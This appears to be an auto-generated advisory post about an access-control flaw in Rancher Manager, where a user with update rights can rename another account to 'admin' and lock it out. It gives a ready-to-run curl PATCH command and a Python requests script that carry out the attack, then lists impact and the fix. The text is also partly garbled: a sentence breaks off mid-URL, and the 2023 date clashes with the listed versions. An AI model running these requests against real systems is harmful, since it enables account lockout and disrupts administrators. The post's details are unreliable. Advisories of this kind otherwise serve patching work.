Listen to this Post
The vulnerability stems from a missing server-side validation check on the `username` field within the Rancher Manager’s user API. In unpatched versions, the API endpoint responsible for updating User resources does not enforce immutability on an existing username. A user with `update` permissions on another user’s resource can send a PUT/PATCH request to the `/v3/users/
Platform: Rancher Manager
Version: < v2.12.2, < v2.11.6, < v2.10.10, < v2.9.12
Vulnerability : Improper Access Control
Severity: Medium
date: 2023
Prediction: Patch available.
What Undercode Say:
curl -X PATCH -H "Authorization: Bearer $TOKEN" -H "Content-Type: application/json" \
-d '{"username":"admin"}' https://rancher.local/v3/users/u-xxxxx
Simulates the flawed update request
import requests
headers = {'Authorization': 'Bearer <attacker_token>'}
payload = {"username": "admin"}
response = requests.patch('https://rancher/v3/users/<target_user_id>', json=payload, headers=headers)
print(response.status_code)
How Exploit:
Attacker with user update permissions modifies a target user’s username to “admin” via the API, causing a login collision and denial of access.
Protection from this CVE
Upgrade to patched versions. Restrict user update permissions to essential, trusted administrators only.
Impact:
Administrative account lockout, denial of service for targeted users, disruption of platform management.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
